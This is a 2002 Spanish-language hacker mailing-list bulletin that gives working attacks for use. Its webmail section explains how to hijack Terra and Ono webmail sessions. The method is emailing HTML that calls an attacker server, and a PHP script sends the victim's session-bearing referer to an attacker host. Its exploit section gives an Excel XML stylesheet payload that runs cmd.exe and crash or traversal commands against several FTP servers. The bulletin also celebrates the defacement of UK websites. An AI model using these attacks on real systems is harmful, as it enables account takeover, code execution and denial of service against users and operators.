Mostrando mensaje 139     < Anterior | Siguiente > Responder a este mensaje Asunto: [NewsUnder] Intrusion en cuentas de mail, bugs & misc exploit, textos, soft varios, misc...... Fecha: Miercoles, 29 de Mayo, 2002  22:20:15 (-0300) Autor: ][ CyERVo ][ <info @.............ar> ==================================== News Under - by La Covacha Underground ==================================== 2713 Members - Buenos Aires, Argentina ==================================== HTTP://www.CyervoNet.com.ar ==================================== 1] Intro & Updates 2] Intrusion en servicios de email; Terra, Ono, Mixmail, y unos cuantos mas.... 3] Vulnerabilidades & exploits misc 4] Textos 5] Soft Varios 6] Misc ==================================== "No creas en nadie, salvo en tu bandera y tu tierra" Proverbio Argentino -------------------------------- 1] Intro -------------------------------- Buenas buenas, por lo visto fue una semana bastannnte agitada... Cambio de cara en LCU; www.cyervonet.com.ar/home.htm , al mismo tiempo, estoy escribiendo una guia de iniciacion en el hacking y el under en general, para los ++++ newbies, a pedido de varios. Colaboradores, ppl con ganas de criticarla, bienvenida sea; www.cyervonet.com.ar/newbies/ -------------------------------- 2] Intrusion en servicios de email; Terra, Ono, Mixmail, y unos cuantos mas.... -------------------------------- |||Terra, Ono||| by AIH Netscape Messenger Express, abreviando NME, es un webmail con bastante aceptación. Es usado, en España, por gente como Terra, Airtel u Ono. Este pequeño documento trata de explicar como NME autentificaa los usuarios, los fallos teóricos que tiene este mecanismo, y por ultimo mostrar 2 casos prácticos de intrusión remota a sesiones de NME ajenas. Recien logueados en nuestro NME, evidentemente como usuarios comunes y corrientes, nos vamos a encontrar en nuestra barra del navegador algo del estilo: http://xxx.xxx.xxx/es/mail.html?sid=er6m0q3hh8seb&lang=es&host=http://xxx.xx x.xxx/&cert=false La primera parte ( http://xxx.xxx.xxx/es/mail.html ) está claro para lo que sirve, sí, tiene toda la pinta de ser una URL como has visto millones. Despues llegamos a la ristra de parametros y tenemos: · sid=er6m0q3hh8seb · lang=es · host=http://xxx.xxx.xxx · cert=false Lo de lang=es parece bastante obvio, el host es el mismo al que hacemos la petición por lo cual tampoco tiene mucho misterio. Luego nos queda ver para que sirve cert y sid. Cert puedo decir, y perdonadme los que esperabais otra cosa, que no tengo ni la más remota idea de para que se utiliza, pero tambien os digo que si lo eliminais y recargais la página no sufre ninguna modificación, así que tampoco parece que sea un parametro _demasiado importante_ ( Si lo poneis a true tampoco pasa nada ). Pues visto lo visto, queda el parametro SID, que supongamos que viene a significar ID Sesion, y que si no nos equivocamos es un string que se genera de forma aleatoria para controlar nuestra sesión dentro de NME una vez que le hemos dado el user/pass de forma satisfactoria. Aquí es cuando ya empezamos a babear, ¿verdad?. ¿Por qué digo esto?. Pues supongo que porque a más de uno se le abrá pasado por la cabeza lo mismo que se me pasó a mí en su momento. Que más o menos es lo siguiente. "Si el SID es lo que controla la sesion, y el SID está como parte de la URL no debe ser demasiado dificil obtener SID´s ajenos". Efectivamente el planteamiento es _casi correcto_ porque como veremos NO es el SID lo único que controla la sesión del usuario ( esto sería demasiado cutre ), pero eso lo vemos despues, ahora vamos al punto. ¿Es tán facil levantarle su SID a otro? Pues es _relativamente sencillo_. El SID forma parte de la URL, por tanto nosotros lo que tenemos que hacer es obtener la URL de la sesión. ¿HTTP_REFERER?. Sí, exacto. Básicamente si queremos obtener el SID de pepito@isp.com, el cual sabemos que lee su correo usando un Netscape Messenger Express, lo que tenemos que hacer es mandarle un correo, en el que se incluya bien attacheado, bien como texto del mismo ( en este caso se han encontrado problemas con el referer ) un html con algo similar a esto: Opcion A: <img src="http://servidor.del.atacante/file.php";> Opcion B: window.open('http://servidor.del.atacante/file.php') El contenido del file.php tampoco es ningun misterio. Y puede ser algo bastante similar a esto. <? // Name: refsnif.php // Autor: FraMe ( frame@kernelpanik.org ) // Web: http://www.kernelpanik.org // Use: Obtain HTTP_REFERER for a connection and send to a client (using sockets). // Vars to modify $PORT = 5555; $NAMEHOST = "xxx.xxx.xxx"; ////////////////////////////////// $rhost = gethostbyname($NAMEHOST); $sock = fsockopen($rhost, $PORT, &$errno, &$errstr, 30); if(!sock) { exit(); } else { fputs($sock,$HTTP_REFERER); } fclose($fp); ?> Para el que no sepa nada de PHP, decir que lo único que hace es abrir un socket hacia una máquina "cliente" ( evidentemente controlada por el que ataca ) y suministrarle el HTTP_REFERER del que ha leido el fichero ( el atacado en este caso ). Como muestra: Logging User Session ... Referer: http://xxx.xxx.xx/attach/file.htm?sid=br6et62qet9b5rt6&mbox=INBOX&uid=131&nu mber=4&filename=abrelo.htm IP Session: 62.42.x.y Pero como ya he dicho antes, no todo podía ser tan sencillo. Si tu llegas con tu recien referer capturado y lo pones el server te va a decir algo del estilo "a parla", aunque como los servidores no tienen humor creo que dicen "Session TimeOut - Relogin", que para el caso viene a ser lo mismo. ¿Entonces que es lo que nos falta?. ¿Cookies?. Pongamos el HTTPush ( http://hispahack.ccc.de ). Pues no, esto no usa cookies. Ups, parece que la cosa se pone fea, ¿La IP?. Pues sí, desgraciadamente o afortunadamente depende de por que lado se mira, MNE usa además del SID la IP del que establece la conexion como parametro de autentificación.¿No hay nada que hacer?. Bueno, eso fue lo primero que puede parecer. Sin embargo no es así. Pues está claro que hay una serie de casos en los que sigue siendo vulnerable. a) Proxy no transparente del lado de los clientes. b) Proxy no transparente del lado del servidor. c) Intranets con NAT. Y en esto de ver lo que pasa con los proxys estabamos cuando descubrimos lo siguiente: >>> TERRA.ES terra.es tambien dispone de un NME como webmail, con una particularidad. Este webmail tiene un problema a la hora de autentificar usuarios provinientes de proxys transparentes, o por lo menos es la única explicacion que le hemos podido dar al fenómenos que vamos a describir a continuacion. ¿Proxys Transparentes?. Si vamos, creo que son así como se llaman y sino lo son seguro que alguien amablemente me lo indica, los proxys que remiten la IP del usuario que ha solicitado la conexion al proxy, de la siguiente forma: X-Forwarded-For: 62.42.X.Y Es cierto que podría poner un chorizo de texto capturado del sniffer, pero no creo que sea necesario. La cuestion es que cuando se realiza un ataque como el descrito anteriormente y el atacante, con su HTTP_REFERER recien capturado: http://mb22.terra.es/es/mail.html?sid=xxxxxxxxxxxxxxxxx&lang=es&host=http:// mb22.terra.es/&cert=false usa para conectar a terra un proxy transparente el control de IP que hace NME queda invalidado, pudiendo acceder a la sesión de usuario. >>> ONOBOX.COM Aquellos usuarios que realizan su entrada a onobox desde el webcache de ono ( generalemnte va1-a-cache.ono.com ) tambien pueden sufrir robos de sesiones por parte de otros usuarios. >>> Consideraciones finales. Todos aquellos usuarios que accedan a servicios NME desde IP´s comunitarias ( proxys, intranets, etc ) son supceptibles de sufrir el robo de sesiones por parte de otros usuarios que puedan compartir su ip. Por ultimo agradecer a MaDj0kEr y a AciD-KrS su ayuda y su paciencia :) Nota: Disculpad las posibles faltas de ortografía, no son intencionales, pero tampoco he tenido ganas de revisar el texto. |||MixMail||| by Giap8 & CyERVo Algo parecido pasa con las cuentas @mixmail.com en el proximo boletin les envio un informe completo, el depto. de mixmail fue avisado, no hicieron nada, uds. ya dispondran del exploit. Nuestro member Giap8 fue el descubridor de dicho bug. -------------------------------- 3] Vulnerabilidades & exploits misc -------------------------------- * Excel XP xml stylesheet problems http://www.guninski.com/ex$el2.html Visualizar ( ejecutar ) un archivo .xls .xml puede provocar la ejecucion de codigo arbitrario... ::Exploit:: <?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="#?m$ux" ?> <xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl";> <xsl:script> <![CDATA[ x=new ActiveXObject("WScript.Shell"); x.Run("%systemroot%\\SYSTEM32\\CMD.EXE /C DIR C:\\ /a /p /s"); ]]> </xsl:script> <msux> msux written by georgi guninski </msux> </xsl:stylesheet> [ Guardar como algo.xml - Reemplazar ? con / ] * Servidores FTP *Ftp XQ http://www.datawizard.net/Support/FtpXQ/ftpxq.htm ::Exploit:: % ftp localhost Connected to xxxxxxxxx.rh.rit.edu. 220 DataWizard Technologies' FtpXQ FTP Server. (Version 2.0.98). User (xxxxxxxxx.rh.rit.edu:(none)): test 331 OK need password. Password: 230 Welcome to DataWizard Technologies' FtpXQ FTP Server. ftp> MKD AAAAAAAAAAAAA.....AAAA [Mas de 254 caracteres, cuelga el servidor. ] *Broker FTP http://www.transsoft.com/ ::Exploit:: $ ftp example.com Connected to example.com. 220 TransSoft's Broker FTP Server. (Version 5.0). User (example.com(none)): test 331 OK need password. Password: 230 Welcome to TransSoft's Broker FTP Server 5.0 ftp> cwd ... [ Enviar este comando varias, veces, causa un cuelgue en el servidor [DoS ]] *Meteor FTP http://207.202.218.172/ ::Exploit:: [ Loguearse, Enviar un comando junto varios caracteres "A", el server caera. ] MKD AAAAAAAAAAAAA...AAAA STOR AAAAAAAAAAAA...AAAA *wFTPd http://www.wftpd.com/ ::Exploit:: [ Bug Transversal ] Loguearse y tirar el comando; CWD ... -------------------------------- 4] Textos -------------------------------- * Download de todas las RFC salidas hasta el momento. ftp://ftp.rfc-editor.org/in-notes/tar/RFC-all.zip [ Request For Comments.....] * Algunos tips a la hora de hackear un IIS http://www.astalavista.com/library/os/iis/basic-exploits.shtml * Mails Anonimos basandonos en paginas .ASP http://www.astalavista.com/code/asp/anonymous-mailing.shtml * Seguridad en WebServers iis 4.0 http://www.networkintrusion.co.uk/IIS%20Sy1.htm * Analisis del nuevo worm para bases de datos SQL http://www.eeye.com/html/Research/Advisories/AL20020522.html * Analisis del nuevo worm para KaZaA http://virusattack.xnetwork.com.ar/base/VerVirus.php3?idvirus=463 Removal: http://www.bitdefender.com/download/antibenjamin.exe -------------------------------- 5] Soft Varios -------------------------------- * Tool para scanneo de maqinas infectadas con el worm de sql http://www.eeye.com/html/Research/Tools/sqlworm.html [Documentacion] http://www.eeye.com/html/Research/Tools/RetinaSqlWorm.exe [Download] * Parche para win NT 4.0 [Elevacion de Privilegios] http://microsoft.com/technet/treeview/default.asp?url=/technet/security/bull etin/ms02-024.asp * Parche para Exchange [ Versiones anteriores a 5.5] http://www.microsoft.com/technet/security/bulletin/ms02-025.asp * Borland Delphi Personal Edition [180megas Aprox] ftp://ftpd.borland.com/download/delphi/personal/BorlandDelphiPersonalEdition .exe -------------------------------- 6] Misc -------------------------------- * El mejor gol de la historia. [Arg 2 - Ing 1 / 1986 Research] http://www.vivadiego.com/argeng86.mov * WebMasters; necesitan hosting? http://www.visualhosting.com.ar http://www.angahosting.com.ar * Se cuenta se cuenta... Le queda muy poco tiempo de vida a KaZaA y a AudioGalaxy, ambos servicios para busqueda y free download de mp3. * Visita el cyber de la amiga Danila, en uruguay, montevideo. http://www.cybermix.com.uy * Esta semana, unos 11 sitios .uk fueron defaceados y owneados por diversos teams argentinos. [25/5 rulz] Algunos de ellos fueron: www.portland.co.uk www.planet-pledge-2000.org.uk/ www-ess.uwe.ac.uk www.limekilns.org.uk www.hackney.gov.uk etc.. Saludos.... En unos dias mas ya tendran disponibles emails @hackeado.com.ar y/o @lcu.org.ar byes CyERVo > http://www.LCU.com.ar > http://www.CyervoNet.com.ar > http://www.NewsUnder.cjb.net _______________________________________________________________________ Visite nuestro patrocinador: ~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~ Suscríbase GRATUITAMENTE a los principales boletines electrónicos de NEGOCIOS del Internet Hispano y obtenga 5 libros digitales de obsequio Haga clic aquí -> http://elistas.net/ml/70/ ~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~